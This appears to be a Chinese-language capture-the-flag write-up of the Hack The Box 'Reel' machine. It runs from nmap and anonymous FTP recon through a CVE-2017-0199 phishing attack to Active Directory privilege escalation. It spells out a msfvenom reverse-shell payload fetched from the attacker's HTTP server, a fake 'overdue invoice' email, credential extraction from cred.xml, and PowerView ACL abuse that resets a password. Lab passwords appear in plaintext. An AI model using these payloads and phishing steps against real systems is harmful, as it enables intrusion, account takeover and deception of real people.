HTB打靶(Active Directory 101 Reel)
2024-05-11 22:32:56
nmap扫描目标
nmap -A -T4 10.10.10.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST
Nmap scan report for 10.10.10.77
Host is up (0.55s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 8220c3bd16cba29c88871d6c1559eded (RSA)
| 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
|_ 256 ac8bde251db7d838389b9c16bff63fed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.93%I=7%D=1/18%Time=63C79217%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (86%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsTRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 636.94 ms 10.10.16.1
2 637.07 ms 10.10.10.77OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.69 seconds发现是一台Windows Server 2012主机且开放了ftp、ssh、smtp协议
尝试登录ftp、ssh
发现可以匿名登录ftp
ftp 10.10.10.77Connected to 10.10.10.77.220 Microsoft FTP ServiceName (10.10.10.77:kali): ftp331 Anonymous access allowed, send identity (e-mail name) as password.Password:230 User logged in.Remote system type is Windows_NT.ftp> dir229 Entering Extended Passive Mode (|||41001|)125 Data connection already open; Transfer starting.05-28-18 11:19PM <DIR> documents226 Transfer complete.ftp>
信息收集
收集发现一下文件并进行下载
ftp> dir229 Entering Extended Passive Mode (|||41007|)125 Data connection already open; Transfer starting.05-28-18 11:19PM 2047 AppLocker.docx05-28-18 01:01PM 124 readme.txt10-31-17 09:13PM 14581 Windows Event Forwarding.docx226 Transfer complete.ftp> get readme.txtlocal: readme.txt remote: readme.txt229 Entering Extended Passive Mode (|||41008|)150 Opening ASCII mode data connection.100% |*******************************| 124 0.19 KiB/s 00:00 ETA226 Transfer complete.124 bytes received in 00:00 (0.13 KiB/s)ftp> get Windows\ Event\ Forwarding.docxlocal: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx229 Entering Extended Passive Mode (|||41010|)150 Opening ASCII mode data connection.100% |*******************************| 14581 14.21 KiB/s 00:00 ETAftp: Reading from network: Interrupted system call0% | | -1 0.00 KiB/s --:-- ETA226 Transfer complete.WARNING! 51 bare linefeeds received in ASCII mode.File may not have transferred correctly.ftp> dir229 Entering Extended Passive Mode (|||41011|)125 Data connection already open; Transfer starting.05-28-18 11:19PM 2047 AppLocker.docx05-28-18 01:01PM 124 readme.txt10-31-17 09:13PM 14581 Windows Event Forwarding.docx226 Transfer complete.ftp> get AppLocker.docxlocal: AppLocker.docx remote: AppLocker.docx229 Entering Extended Passive Mode (|||41012|)150 Opening ASCII mode data connection.100% |*******************************| 2047 2.27 KiB/s 00:00 ETA226 Transfer complete.WARNING! 9 bare linefeeds received in ASCII mode.File may not have transferred correctly.2047 bytes received in 00:01 (1.70 KiB/s)ftp> exit221 Goodbye.
使用exiftool查看"Windows Event Forwarding.docx"源数据
命令:exiftool "Windows Event Forwarding.docx"
回显: ExifTool Version Number : 12.49File Name : Windows Event Forwarding.docxDirectory : .File Size : 15 kBFile Modification Date/Time : 2023:01:18 01:58:38-05:00File Access Date/Time : 2023:01:18 01:59:18-05:00File Inode Change Date/Time : 2023:01:18 01:58:38-05:00File Permissions : -rw-r--r--File Type : DOCXFile Type Extension : docxMIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.documentZip Required Version : 20Zip Bit Flag : 0x0006Zip Compression : DeflatedZip Modify Date : 1980:01:01 00:00:00Zip CRC : 0x82872409Zip Compressed Size : 385Zip Uncompressed Size : 1422Zip File Name : [Content_Types].xmlCreator : nico@megabank.comRevision Number : 4Create Date : 2017:10:31 18:42:00ZModify Date : 2017:10:31 18:51:00ZTemplate : Normal.dotmTotal Edit Time : 5 minutesPages : 2Words : 299Characters : 1709Application : Microsoft Office WordDoc Security : NoneLines : 14Paragraphs : 4Scale Crop : NoHeading Pairs : Title, 1Titles Of Parts :Company :Links Up To Date : NoCharacters With Spaces : 2004Shared Doc : NoHyperlinks Changed : NoApp Version : 14.0000
发现nico@megabank.com邮箱
尝试通过邮箱进行网络钓鱼获得shell
使用的CVE:CVE-2017-0199
下载:https://github.com/bhdresh/CVE-2017-0199
简单说明:CVE-2017-0199是Microsoft Office在OLE处理机制实现上存在的一个逻辑漏洞,此漏洞的成因主要是word在处理内嵌OLE2LIN对象时,通过网络更新对象时没有正确处理Content-Type所导致的一个逻辑漏洞。由于逻辑漏洞的成因,就导致利用该漏洞时不需要绕过微软采用的一系列诸如ASLR、DEP之类的漏洞缓解措施,因此成功率非常高
msf生成shell马命令:msfvenom -p windows/shell_reverse_tcp lhost=10.10.16.13 lport=6666 -f hta-psh -o shell.hta使用python开启http服务用于远程文件加载命令:python3 -m http.server 80
生成rft载荷文档命令:python2 cve-2017-0199_toolkit.py -M gen -w hi.rtf -u http://10.10.16.13/shell.hta -t rtf -x 0
开启nc用于反弹shell接收
命令:nc -nvlp 6666
sendemail向目标邮箱发送载荷文件
命令:sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a hi.rtf -s 10.10.10.77 -v
回显:Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => Connecting to 10.10.10.77:25Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => My IP address is: 10.10.16.13Jan 18 03:59:55 kali sendEmail[40007]: SUCCESS => Received: 220 Mail Service readyJan 18 03:59:55 kali sendEmail[40007]: INFO => Sending: EHLO kaliJan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELPJan 18 03:59:56 kali sendEmail[40007]: INFO => Sending: MAIL FROM:<mac@megabank.com>Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received: 250 OKJan 18 03:59:56 kali sendEmail[40007]: INFO => Sending: RCPT TO:<nico@megabank.com>Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received: 250 OKJan 18 03:59:57 kali sendEmail[40007]: INFO => Sending: DATAJan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received: 354 OK, send.Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending message bodyJan 18 03:59:57 kali sendEmail[40007]: Setting content-type: text/plainJan 18 03:59:57 kali sendEmail[40007]: DEBUG => Sending the attachment [hi.rtf]Jan 18 04:00:09 kali sendEmail[40007]: SUCCESS => Received: 250 Queued (12.156 seconds)Jan 18 04:00:09 kali sendEmail[40007]: Email was sent successfully! From: <mac@megabank.com> To: <nico@megabank.com> Subject: [Invoice Attached] Attachment(s): [hi.rtf] Server: [10.10.10.77:25]
过一段时间后nc获得shellpython http被访问:python3 -m http.server 80Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...10.10.10.77 - - [18/Jan/2023 04:00:25] "GET /shell.hta HTTP/1.1" 200 -10.10.10.77 - - [18/Jan/2023 04:00:26] "GET /shell.hta HTTP/1.1" 200 -nc获得shellnc -nvlp 6666listening on [any] 6666 ...connect to [10.10.16.13] from (UNKNOWN) [10.10.10.77] 60488Microsoft Windows [Version 6.3.9600](c) 2013 Microsoft Corporation. All rights reserved.C:\Windows\system32>
获取user旗帜C:\Users\nico\Desktop>type user.txt
使用msf代替nc获取shellmsfconsole msf > use exploit/windows/fileformat/office_word_htamsf > set lhost 10.10.14.17msf > set lport 4444msf > set srvhost 10.10.14.17msf > runsendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v
获得Tom账号
在当前用户桌面上发现敏感文件cred.xml该文件是 PSCredential
对象当中Export-CliXml方法输出的 XML 文档,而 PSCredential
对象在 Powershell 中主要用于存储用户名、密码和凭据
使用powershell提取密码命令:powershell -c "$cred = Import-CliXml -Path c:\Users\nico\Desktop\cred.xml;$cred.GetNetworkCredential() | Format-List *"
回显: UserName : TomPassword : 1ts-mag1c!!!SecurePassword : System.Security.SecureStringDomain : HTB
获得账号htb\Tom:1ts-mag1c!!!
开启smb匿名访问用于传输文件
开启smb匿名访问命令: python3 smbserver.py share /home/kali/Desktop/temp/
htb\Tom:1ts-mag1c!!!账号ssh登录目标机器进行信息收集,发现以下关键信息C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors05/29/2018 07:57 PM <DIR> .05/29/2018 07:57 PM <DIR> ..11/16/2017 11:50 PM 112,225 acls.csv10/28/2017 08:50 PM 3,549 BloodHound.bin10/24/2017 03:27 PM 246,489 BloodHound_Old.ps110/24/2017 03:27 PM 568,832 SharpHound.exe10/24/2017 03:27 PM 636,959 SharpHound.ps15 File(s) 1,568,054 bytes2 Dir(s) 4,937,048,064 bytes free将acls.csv拖回到攻击机命令:copy acls.csv \\10.10.16.13\share\
手动分析acls.csv文件
发现一下关键信息:
claire@HTB.LOCAL USER tom@HTB.LOCAL USER WriteOwner AccessAllowed FALSE
Backup_Admins@HTB.LOCAL GROUP claire@HTB.LOCAL USER WriteDacl AccessAllowed FALSE
tom@HTB.LOCA具有对claire@HTB.LOCAL账号WriteOwner权限,claire@HTB.LOCAL账号对 Backup_Admins@HTB.LOCAL具有WriteDacl权限。
权限提升
使用PowerView进行权限滥用提权
下载:https://github.com/PowerShellMafia/PowerSploit
所在目录:PowerSploit-master\PowerSploit-master\Recon
利用方式:. .\PowerView.ps1 //将PowerView导入把当前用户tom设置为claire用户的 ACL 的所有者并授予其修改密码的权限Set-DomainObjectOwner -Identity claire -OwnerIdentity tomAdd-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose设置claire的密码为Ab345678123!@#$cred = ConvertTo-SecureString "Ab345678123!@#" -AsPlainText -forceSet-DomainUserPassword -identity claire -accountpassword $credssh登录ssh claire@10.129.5.10查看backup_admins组发现只有ranj用户net group backup_admins将claire用户添加到backup_admins用户组下之后重新登录net group backup_admins claire /addnet group backup_admins
在备份目录Backup Scripts中遍历密码,成功找到administrator密码Cr4ckMeIfYouC4n!获取到system权限
总结
nmap发现是一台Windows Server 2012主机且开放了ftp、ssh、smtp协议,发现可以匿名登录ftp
发现docx文件exiftool查看"Windows Event Forwarding.docx"源数据找到邮箱,使用 CVE-2017-0199
进行钓鱼攻击获得nc反弹shell获得权限,分析Bloodhound发现 tom@HTB.LOCA具有对claire@HTB.LOCAL
账号WriteOwner权限,claire@HTB.LOCAL账号对 Backup_Admins@HTB.LOCAL具有WriteDacl权限,
尝试使用PowerView进行权限滥用攻击,提权成功后在备份目录Backup Scripts中遍历密码,
成功找到administrator密码Cr4ckMeIfYouC4n!获取到system权限。
HTB打靶(Active Directory 101 Reel)相关推荐
- HTB打靶(Active Directory 101 Mantis)
namp扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 03:40 EST Stats: 0:01:28 elapsed; 0 hos ...
- HTB打靶(Active Directory 101 Sizzle)
namp扫描 nmap -A -T4 10.129.4.79 Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 02:44 EST Stats ...
- Active Directory 101 - LLMNR
This is the first article of my Active Directory Series. I'll be reading through materials and try t ...
- 创建Win2003域和Win2008域之间的信任关系,Active Directory系列之十八
创建Win2003域和Win2008域之间的信任关系 我们在上一篇文章中创建了域信任关系,这个信任关系发生在两个Win2003域之间,而且两个域使用了同一个DNS服务器.今天我们更换一个实验场景,拓扑 ...
- Active Directory网域
Active Directory网域 3.1Windows网络的管理方式 3.1.1工作组模式 工作组由一组用网络连接在一起的计算机组成,他们将计算机内的资源共享给用户访问.工作组网络也被称为&quo ...
- 查找计算机 域服务不可用,win7系统打印文件提示Active Directory域服务不可用解决方法...
办公用户因为工作需要,就需要安装打印机,也是办公设备中不可缺少一部分,使用过程中难免遇到一些故障问题,Win7系统打印文件时频繁弹出提示"Active Directory域服务当前不可用&q ...
- Active Directory 账号迁移配置介绍
首先介绍一下环境: 生产域环境: example.cn 测试域环境: fengdian.info 系统平台: 2K08 R2 林.域功能级别:Windows Server 2008 要求: 测试域环境 ...
- 实战域树部署,Active Directory系列之十九
实战子域部署<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /> ...
- Powershell管理Active Directory 复制和拓扑
Powershell管理Active Directory 复制和拓扑 Active Directory 的 Windows PowerShell (AD) 支持复制和拓扑管理.它包含了管理复制.站点. ...
最新文章
- IDEA常用快捷键整理
- python实时得到鼠标的位置
- Ubuntu服务器安装lamp
- mysql 统计 邮箱_mysql查询之 连续出现的数字,重复出现的邮箱,删除重复的电子邮箱...
- python自动保存图片_Python学习笔记:利用爬虫自动保存图片
- PHP5.5中新增的参数跳跃和生成器功能介绍
- (72)仿真工具VCS仿真软件?
- SQLSERVER数据库设置varchar类型主键自增方法
- NLP︱高级词向量表达(三)——WordRank(简述)
- 机器学习面试- 推荐系统的常用算法
- CSS3---渲染属性
- 通达OA的一些资源地址,持续更新
- 为Clion配置mingw32或mingw64
- 如何从表象深入IPFS本质?Filenet诠释公链底层难题
- go语言 调用接口的方法
- 小公司如何处理大订单
- 施耐德PM5350电度表电能数据解析
- 归档日志路径三个参数DB_RECOVERY_FILE_DEST和LOG_ARCHIVE_DEST和LOG_ARCHIVE_DEST_n
- 爬虫入门(1)——requests(1)
- 你不知道的接近开关与PLC连接时如何判断用PNP还是NPN